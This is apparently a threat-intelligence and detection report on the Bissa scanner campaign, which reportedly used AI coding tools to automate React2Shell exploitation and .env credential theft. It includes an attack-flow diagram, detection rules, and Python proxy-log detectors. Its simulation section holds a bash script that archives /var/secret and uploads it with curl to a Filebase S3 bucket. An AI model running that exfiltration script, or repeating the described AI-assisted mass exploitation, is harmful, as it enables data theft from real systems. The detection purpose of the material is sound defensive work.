Bissa Scanner Exposed: AI-Assisted Mass Exploitation and Credential Harvesting
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
An exposed server revealed a large-scale operation that used the Bissa scanner platform, Claude Code and OpenClaw to automate exploitation of internet‑facing targets via a React2Shell vulnerability (CVE‑2025‑55182). The campaign harvested millions of .env files containing high‑value credentials from AI, cloud, payment and messaging services. Collected data were uploaded to a public S3 bucket on Filebase for further use. The operation targeted organizations in financial, cryptocurrency and retail sectors.
Investigation
Analysts recovered over 13,000 files showing the workflow for scanning, exploiting, validating and prioritising victim environments. Logs confirmed more than 900 successful compromises using the React2Shell exploit. Telegram bots were used for real‑time alerting, linking each hit to victim details. The scanner also contained a module for a WordPress W3 Total Cache vulnerability (CVE‑2025‑9501), though no successful exploitation of it was observed.
Mitigation
Patch vulnerable applications and frameworks promptly, especially React Server Components affected by React2Shell (CVE‑2025‑55182) and the WordPress W3 Total Cache plugin (CVE‑2025‑9501). Move secrets out of .env files into a dedicated secret manager and rotate credentials regularly. Restrict access to cloud instance metadata and enforce least‑privilege RBAC. Monitor outbound traffic to detect unauthorized uploads to external storage services such as Filebase.
Response
Implement detection rules for exploitation of CVE‑2025‑55182 and unauthorized S3 uploads. Block known malicious domains and Telegram bot communications. Conduct forensic analysis of compromised hosts to locate residual payloads and remove them. Notify affected users and rotate any leaked credentials immediately.
Attack Flow
```mermaid
graph TB
  %% Class definitions
  classDef technique fill:#ffcc99
  classDef tool fill:#cccccc
  classDef action fill:#99ccff
  classDef operator fill:#ff9900
  %% Nodes
  tool_bissa_scanner["<b>Tool</b> – <b>Name</b>: Bissa scanner<br/><b>Purpose</b>: Perform massive active scanning using target feeds"]
  class tool_bissa_scanner tool
  tech_T1595_002["<b>Technique</b> – <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/><b>Description</b>: Scans Internet-facing hosts to find vulnerable services"]
  class tech_T1595_002 technique
  tech_T1190["<b>Technique</b> – <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Exploits vulnerable web applications to gain initial access"]
  class tech_T1190 technique
  tool_react2shell["<b>Tool</b> – <b>Name</b>: React2Shell (CVE-2025-55182)<br/><b>Function</b>: Provides remote code execution via crafted React payload"]
  class tool_react2shell tool
  tech_T1210["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Description</b>: Executes payload on remote services to obtain code execution"]
  class tech_T1210 technique
  tech_T1211["<b>Technique</b> – <b>T1211 Exploitation for Defense Evasion</b><br/><b>Description</b>: Uses vulnerabilities to bypass defenses and stay hidden"]
  class tech_T1211 technique
  tech_T1552_001["<b>Technique</b> – <b>T1552.001 Unsecured Credentials: Credentials In Files</b><br/><b>Description</b>: Harvests credentials stored in configuration files such as .env"]
  class tech_T1552_001 technique
  tech_T1119["<b>Technique</b> – <b>T1119 Automated Collection</b><br/><b>Description</b>: Automates validation, prioritization, and batching of collected data for exfiltration"]
  class tech_T1119 technique
  tech_T1102_002["<b>Technique</b> – <b>T1102.002 Web Service: Bidirectional Communication</b><br/><b>Description</b>: Uses web services (Telegram bots) to exchange commands and data"]
  class tech_T1102_002 technique
  tool_telegram_bot["<b>Tool</b> – <b>Name</b>: Telegram bots @bissapwned_bot, @bissa_scan_bot<br/><b>Purpose</b>: Command-and-control channel"]
  class tool_telegram_bot tool
  tech_T1567_002["<b>Technique</b> – <b>T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage</b><br/><b>Description</b>: Uploads stolen archives to cloud storage via web service"]
  class tech_T1567_002 technique
  tool_filebase_bucket["<b>Tool</b> – <b>Name</b>: Filebase S3-compatible bucket (bissapromax)<br/><b>Purpose</b>: Stores exfiltrated credential archives"]
  class tool_filebase_bucket tool
  tech_T1537["<b>Technique</b> – <b>T1537 Transfer Data to Cloud Account</b><br/><b>Description</b>: Moves data to an attacker-controlled cloud account for later retrieval"]
  class tech_T1537 technique
  tech_T1068["<b>Technique</b> – <b>T1068 Exploitation for Privilege Escalation</b><br/><b>Description</b>: Leverages harvested credentials to gain higher privileges and lateral movement"]
  class tech_T1068 technique
  %% Connections
  tool_bissa_scanner -->|performs| tech_T1595_002
  tech_T1595_002 -->|identifies vulnerable services| tech_T1190
  tech_T1190 -->|uses| tool_react2shell
  tool_react2shell -->|delivers payload to| tech_T1210
  tech_T1210 -->|enables| tech_T1211
  tech_T1211 -->|allows| tech_T1552_001
  tech_T1552_001 -->|feeds into| tech_T1119
  tech_T1119 -->|sends data via| tech_T1102_002
  tech_T1102_002 -->|implemented by| tool_telegram_bot
  tech_T1102_002 -->|exfiltrates to| tech_T1567_002
  tech_T1567_002 -->|stores in| tool_filebase_bucket
  tool_filebase_bucket -->|enables| tech_T1537
  tech_T1537 -->|supports| tech_T1068
```
Detections
- Possible CVE-2025-55182 (Unauthenticated RCE in React Server Components) Exploitation Attempt (via webserver)
- Possible CVE-2025-55182 (Unauthenticated RCE in React Server Components) Exploitation Attempt (via proxy)
- Possible C2 Communications Over HTTP To Direct IP With Uncommon Port (via proxy)
- Data Exfiltration via S3-Compatible Filebase [Proxy]
- Data Exfiltration via S3-Compatible Filebase [AWS Cloudtrail]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands:
The adversary has harvested a set of confidential documents from /var/secret/. To avoid detection, they first archive the data into a password‑protected ZIP file, then use curl to upload the archive directly to the Filebase S3 endpoint through the corporate forward proxy. The proxy logs the full request URL, which matches the detection rule.
Regression Test Script:
```bash
#!/usr/bin/env bash
set -euo pipefail

# 1️⃣ Stage data (T1074)
STAGE_DIR="/tmp/staged_data"
mkdir -p "$STAGE_DIR"
cp -r /var/secret/* "$STAGE_DIR/"

# 2️⃣ Archive data (T1560.001) – password protected zip
ARCHIVE="/tmp/exfil_archive.zip"
ZIP_PASSWORD="P@ssw0rd!"
zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null

# 3️⃣ Exfiltrate via Filebase S3 endpoint (T1020)
# Assume the proxy is reachable at http://proxy.company.local:3128
FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
curl -x http://proxy.company.local:3128 -T "$ARCHIVE" \
  -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" \
  "$FILEBASE_URL" --silent --output /dev/null
echo "Exfiltration attempt completed."
```
Cleanup Commands:
```bash
# Remove staged files and archive
rm -rf /tmp/staged_data /tmp/exfil_archive.zip
# (Optional) Flush proxy connections if needed
# For Squid: squid -k rotate
echo "Cleanup finished."
```
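As an added example (not code from the original page or from the Bissa tooling), the two proxy-side detections listed above, "Data Exfiltration via S3-Compatible Filebase [Proxy]" and "Possible C2 Communications Over HTTP To Direct IP With Uncommon Port", written as checks over Squid native-format access log records; the log lines, client addresses, byte counts and the `mybucket`/`batch42.zip` object names are constructed for this example, and the simulation's PUT of the archive to s3.filebase.com through the forward proxy is exactly the record the first rule is meant to flag.

```python
import re
from urllib.parse import urlsplit

# Constructed Squid native-format access.log records for this example (not data from the
# incident). Fields: time elapsed client action/code bytes method URL user hier/peer type.
SAMPLE_PROXY_LOG = """\
1712000001.123 412 10.0.4.17 TCP_MISS/200 812345 PUT https://s3.filebase.com/mybucket/exfil_archive.zip - HIER_DIRECT/203.0.113.10 application/octet-stream
1712000002.456 88 10.0.4.17 TCP_MISS/200 2210 GET https://www.example.com/index.html - HIER_DIRECT/198.51.100.7 text/html
1712000003.789 390 10.0.4.22 TCP_MISS/200 9000000 PUT https://bissapromax.s3.filebase.com/batch42.zip - HIER_DIRECT/203.0.113.10 application/zip
1712000004.012 61 10.0.4.22 TCP_MISS/200 512 GET https://s3.filebase.com/public/readme.txt - HIER_DIRECT/203.0.113.10 text/plain
1712000005.345 900 10.0.4.31 TCP_TUNNEL/200 4096 CONNECT 203.0.113.55:4444 - HIER_DIRECT/203.0.113.55 -
"""

FILEBASE_HOST = "s3.filebase.com"   # matches path-style and virtual-hosted (bucket.s3.filebase.com)
UPLOAD_METHODS = {"PUT", "POST"}    # S3 PutObject / multipart parts and POST-form uploads
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def parse_line(line):
    """Split one Squid native record into the fields the rules need; None if malformed."""
    f = line.split()
    return None if len(f) < 10 else {"client": f[2], "bytes": int(f[4]), "method": f[5], "url": f[6]}

def host_port(method, url):
    """CONNECT records carry host:port rather than a URL; everything else is a full URL."""
    if method == "CONNECT":
        host, _, port = url.rpartition(":")
        return host, int(port)
    parts = urlsplit(url)
    return parts.hostname or "", parts.port or (443 if parts.scheme == "https" else 80)

def is_filebase_upload(rec):
    """Rule 1: an upload method to Filebase's S3-compatible endpoint, either addressing style."""
    host, _ = host_port(rec["method"], rec["url"])
    return rec["method"] in UPLOAD_METHODS and (host == FILEBASE_HOST or host.endswith("." + FILEBASE_HOST))

def is_direct_ip_uncommon_port(rec):
    """Rule 2: traffic to a literal IPv4 address on a port other than 80/443."""
    host, port = host_port(rec["method"], rec["url"])
    return bool(IPV4_RE.match(host)) and port not in (80, 443)

def scan_proxy_log(text):
    """Run both rules over a log; returns (rule, client, destination, bytes) per match, in log order."""
    alerts = []
    for rec in filter(None, map(parse_line, text.splitlines())):
        if is_filebase_upload(rec):
            alerts.append(("filebase_upload", rec["client"], rec["url"], rec["bytes"]))
        if is_direct_ip_uncommon_port(rec):
            alerts.append(("direct_ip_uncommon_port", rec["client"], rec["url"], rec["bytes"]))
    return alerts
```

Running `scan_proxy_log(SAMPLE_PROXY_LOG)` returns two Filebase upload alerts (the path-style and the virtual-hosted PUT) and one direct-IP alert for the CONNECT to port 4444, while the GET requests to s3.filebase.com are not flagged.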